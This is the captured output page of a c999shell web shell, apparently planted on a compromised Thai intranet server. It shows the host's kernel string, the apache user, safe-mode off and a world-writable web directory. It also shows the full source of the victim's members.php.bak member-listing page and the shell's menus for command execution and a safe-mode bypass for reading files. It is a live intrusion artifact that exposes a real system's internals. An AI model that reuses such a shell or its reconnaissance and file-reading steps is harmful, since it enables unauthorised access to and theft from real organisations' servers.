Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/intranet/ drwxrwxrwx |
Viewing file: members.php.bak (3.06 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | <? session_start(); include_once('config.php'); chkLogin(); getFullName($_SESSION[uid], $_SESSION[gid]); ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-874"> <link href="style.css" rel="stylesheet" type="text/css"> <title>-== : ยินดีต้อนรับระบบ Intranet BCNU : ==-</title> <script language="JavaScript"> function del (object) { if (confirm("คุณต้องการจะลบชื่อจากระบบใช่หรือไม่") ==true) { return true; } return false; } </script> </head> <body leftmargin="0" rightmargin="0" topmargin="0" bottommargin="0"> <table width="755" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2" align="center"><?php include("header.php");?></td> </tr> <tr> <td colspan="2" background="images/bg_table.png" height="30"><div align="right" class="f3"> ยินดีต้อนรับ คุณ <?=getFullName($_SESSION[gid]); ?> </div></td> </tr> <tr> <td width="30%" bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td align="center" valign="top" bgcolor="#FFEECC"><?php include("menu_admin.php");?></td> <td valign="top" bgcolor="#FFFFFF"> <?php connDB(); $sql ="select * from person"; $result = mysql_query($sql); $num_rows = mysql_num_rows($result); echo ("<div align=center class=f7>มีจำนวนทั้งหมด $num_rows คน</div>"); echo ("<br>"); echo ("<table width='95%' border='0' align='center' cellpadding='0' cellspacing='1' bgcolor='#E3F0FC'>"); echo ("<tr>"); echo ("<td align=center class='f7' height='20'>ลำดับ</td>"); echo ("<td align=center class='f7' height='20'>ชื่อ - นามสกุล</td>"); echo ("<td align=center class='f7' height='20'>รายละเอียด</td>"); echo ("<td align=center class='f7' height='20'>แก้ไข</td>"); echo ("<td align=center class='f7' height='20'>ลบ</td>"); $i=0; while ($record=mysql_fetch_array($result)) { $i ++; echo ("<tr>"); echo ("<td align=center class=f6 bgcolor='#FFFFFF' height='20'>$i</td>"); echo ("<td class=f6 bgcolor='#FFFFFF' height='20'> $record[prefix] $record[fname] $record[lname]</td>"); echo ("<td width='15%' align=center class=f6 bgcolor='#FFFFFF' height='20'><a href='detail.php?pid=$record[pid]'>view</a></td>"); echo ("<td width='15%' align=center class=f6 bgcolor='#FFFFFF' height='20'><a href='edit.php?pid=$record[pid]'>view</a></td>"); echo ("<td width='15%' align=center class=f6 bgcolor='#FFFFFF' height='20'><a href='delete.php?pid=$record[pid]' onClick=\"return del(this)\">view</a></td>"); echo ("</tr>"); } echo ("</table>"); ?></td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td colspan="2" align="center"><?php include("footer.php");?></td> </tr> </table> </body> </html> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0065 ]-- |